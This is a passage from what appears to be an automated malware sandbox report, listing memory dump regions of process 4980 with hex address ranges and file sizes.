                                                                • memory/4980-72-0x00000236E9770000-0x00000236E9AE5000-memory.dmp

                                                                  Filesize

                                                                  3.5MB

                                                                • memory/4980-183-0x00007FFA37AC0000-0x00007FFA37C33000-memory.dmp

                                                                  Filesize

                                                                  1.4MB

                                                                • memory/4980-73-0x00007FFA27DB0000-0x00007FFA27E68000-memory.dmp

                                                                  Filesize

                                                                  736KB

                                                                • memory/4980-219-0x00007FFA27A30000-0x00007FFA27DA5000-memory.dmp

                                                                  Filesize

                                                                  3.5MB

                                                                • memory/4980-244-0x00007FFA38580000-0x00007FFA385AE000-memory.dmp

                                                                  Filesize

                                                                  184KB

                                                                • memory/4980-249-0x00000236E9770000-0x00000236E9AE5000-memory.dmp

                                                                  Filesize

                                                                  3.5MB

                                                                • memory/4980-74-0x00007FFA3CD70000-0x00007FFA3CD94000-memory.dmp

                                                                  Filesize

                                                                  144KB

                                                                • memory/4980-280-0x00007FFA3CD70000-0x00007FFA3CD94000-memory.dmp

                                                                  Filesize

                                                                  144KB

                                                                • memory/4980-294-0x00007FFA27DB0000-0x00007FFA27E68000-memory.dmp

                                                                  Filesize

                                                                  736KB

                                                                • memory/4980-279-0x00007FFA28940000-0x00007FFA28F28000-memory.dmp

                                                                  Filesize

                                                                  5.9MB

                                                                • memory/4980-62-0x00007FFA388E0000-0x00007FFA388F9000-memory.dmp

                                                                  Filesize

                                                                  100KB

                                                                • memory/4980-285-0x00007FFA37AC0000-0x00007FFA37C33000-memory.dmp

                                                                  Filesize

                                                                  1.4MB

                                                                • memory/4980-71-0x00007FFA27A30000-0x00007FFA27DA5000-memory.dmp

                                                                  Filesize

                                                                  3.5MB

                                                                • memory/4980-69-0x00007FFA28940000-0x00007FFA28F28000-memory.dmp

                                                                  Filesize

                                                                  5.9MB

                                                                • memory/4980-70-0x00007FFA38580000-0x00007FFA385AE000-memory.dmp

                                                                  Filesize

                                                                  184KB

                                                                • memory/4980-188-0x00007FFA388E0000-0x00007FFA388F9000-memory.dmp

                                                                  Filesize

                                                                  100KB

                                                                • memory/4980-58-0x00007FFA38900000-0x00007FFA38923000-memory.dmp

                                                                  Filesize

                                                                  140KB

                                                                • memory/4980-112-0x00007FFA38900000-0x00007FFA38923000-memory.dmp

                                                                  Filesize

                                                                  140KB

                                                                • memory/4980-293-0x00007FFA28330000-0x00007FFA2844C000-memory.dmp

                                                                  Filesize

                                                                  1.1MB

                                                                • memory/4980-56-0x00007FFA38930000-0x00007FFA38949000-memory.dmp

                                                                  Filesize

                                                                  100KB

                                                                • memory/4980-54-0x00007FFA38950000-0x00007FFA3897D000-memory.dmp

                                                                  Filesize

                                                                  180KB

                                                                • memory/4980-30-0x00007FFA3CD70000-0x00007FFA3CD94000-memory.dmp

                                                                  Filesize

                                                                  144KB

                                                                • memory/4980-32-0x00007FFA3CED0000-0x00007FFA3CEDF000-memory.dmp

                                                                  Filesize

                                                                  60KB

                                                                • memory/4980-25-0x00007FFA28940000-0x00007FFA28F28000-memory.dmp

                                                                  Filesize

                                                                  5.9MB

                                                                • memory/4980-330-0x00007FFA28940000-0x00007FFA28F28000-memory.dmp

                                                                  Filesize

                                                                  5.9MB

                                                                • memory/4980-352-0x00007FFA388E0000-0x00007FFA388F9000-memory.dmp

                                                                  Filesize

                                                                  100KB

                                                                • memory/4980-355-0x00007FFA27DB0000-0x00007FFA27E68000-memory.dmp

                                                                  Filesize

                                                                  736KB

                                                                • memory/4980-345-0x00007FFA28940000-0x00007FFA28F28000-memory.dmp

                                                                  Filesize

                                                                  5.9MB

                                                                • memory/4980-360-0x00007FFA38870000-0x00007FFA38884000-memory.dmp

                                                                  Filesize

                                                                  80KB

                                                                • memory/4980-359-0x00007FFA28330000-0x00007FFA2844C000-memory.dmp

                                                                  Filesize

                                                                  1.1MB

                                                                • memory/4980-358-0x00007FFA388C0000-0x00007FFA388CD000-memory.dmp

                                                                  Filesize

                                                                  52KB

                                                                • memory/4980-356-0x00007FFA27A30000-0x00007FFA27DA5000-memory.dmp

                                                                  Filesize

                                                                  3.5MB

                                                                • memory/4980-354-0x00007FFA38580000-0x00007FFA385AE000-memory.dmp

                                                                  Filesize

                                                                  184KB

                                                                • memory/4980-353-0x00007FFA388D0000-0x00007FFA388DD000-memory.dmp

                                                                  Filesize

                                                                  52KB

                                                                • memory/4980-351-0x00007FFA37AC0000-0x00007FFA37C33000-memory.dmp

                                                                  Filesize

                                                                  1.4MB

                                                                • memory/4980-350-0x00007FFA38900000-0x00007FFA38923000-memory.dmp

                                                                  Filesize

                                                                  140KB

                                                                • memory/4980-349-0x00007FFA38930000-0x00007FFA38949000-memory.dmp

                                                                  Filesize

                                                                  100KB

                                                                • memory/4980-348-0x00007FFA38950000-0x00007FFA3897D000-memory.dmp

                                                                  Filesize

                                                                  180KB

                                                                • memory/4980-60-0x00007FFA37AC0000-0x00007FFA37C33000-memory.dmp

                                                                  Filesize

                                                                  1.4MB

                                                                • memory/4980-346-0x00007FFA3CD70000-0x00007FFA3CD94000-memory.dmp

                                                                  Filesize

                                                                  144KB